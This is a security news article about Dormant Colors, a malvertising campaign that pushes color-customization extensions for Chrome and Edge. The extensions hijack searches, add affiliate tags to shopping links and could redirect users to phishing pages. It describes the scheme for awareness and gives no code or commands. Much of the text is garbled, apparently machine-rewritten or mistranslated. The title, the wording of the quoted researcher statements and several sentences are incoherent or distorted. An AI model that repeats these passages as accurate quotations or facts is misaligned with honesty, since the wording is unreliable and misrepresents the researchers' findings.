Dormant Colors campaign runs over 1 million malicious Chrome extension security transactions

A new malvertising campaign, codenamed Dormant Colors, is delivering malicious Google Chrome extensions that hijack target browsers.

Researchers at Guardio Labs have discovered a new malvertising campaign called Dormant Colors designed to deliver malicious Google Chrome extensions.

Chrome extension hijacks search and inserts affiliate links into web pages.

Experts refer to this activity as Dormant Colors because the extensions offer color customization options.

“It started with a scheming malvertising campaign and continued A Clever New Way to Sideload Really Malicious Code no one noticed (Up to now!), and ended up stealing not only your search and browsing data, but also associations with 10,000 targeted sites—a capability that could easily be used for targeted spear phishing, account takeover, and credential extraction— All using this powerful network of millions of infected computers around the world! ” Read the post by Guardio Labs.

By mid-October 2022, researchers found at least 30 variants of these extensions in the Chrome and Edge web stores.

Malicious browser extensions have surpassed one million installations.

Experts noticed that the Chrome extension’s code did not initially contain malicious components, but later added malicious code snippets to the code.

The attack chain relies on malvertising messages designed to trick victims into clicking the install button, as shown in the video below:

After clicking the “OK” or “Continue” button, the victim is prompted to install the color-changing extension.

When these extensions are installed, they redirect users to various pages that sideload malicious scripts that modify browser behavior.

These extensions are able to hijack searches and return affiliate links as results. The scheme allows threat actors to earn revenue from traffic to these sites and steal data.

Experts note that these malicious extensions are more numerous than other search hijackers because they include “stealth modules for code updates and telemetry collection, as well as server backbones that collect data from millions of users.” The collected data is used to classify potential targets and select the best social engineering attack vectors to target them and steal credentials.

The Dormant Colors business relies on affiliations with 10,000 target sites and uses a global network of millions of infected computers.

Attackers attach affiliate tags to URLs, and any purchases made on the site generate commissions for the operator.

Below is a video released by the researchers showing the affiliation hijacking of the shopping site. The video shows that the address bar is populated with dependent origin data.

Apparently, the same process can be used to redirect victims to phishing pages to steal credentials for popular services, including Microsoft 365, online banking, and social media platforms.

“This activity is still ongoing, shifting domains, generating new extensions, and reinventing more color and style changing features that you can definitely get away with. Beyond that, the code injection technique analyzed here is a method used to mitigate and circumvent the massive infrastructure and allow Use this campaign for more malicious activities in the future. The summary report also includes an Indicator of Compromise (IoC) for this campaign. “At the end of the day, not only will your affiliate fee be charged, but your privacy and your internet experience is compromised here in ways that can be compromised by gaining credentials and hijacking accounts and Financial data to target organizations. It’s worth it without any extensions that make a beautiful website look dark and ugly…”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(security affairs hacking, malvertising)

Leave a Reply

Your email address will not be published. Required fields are marked *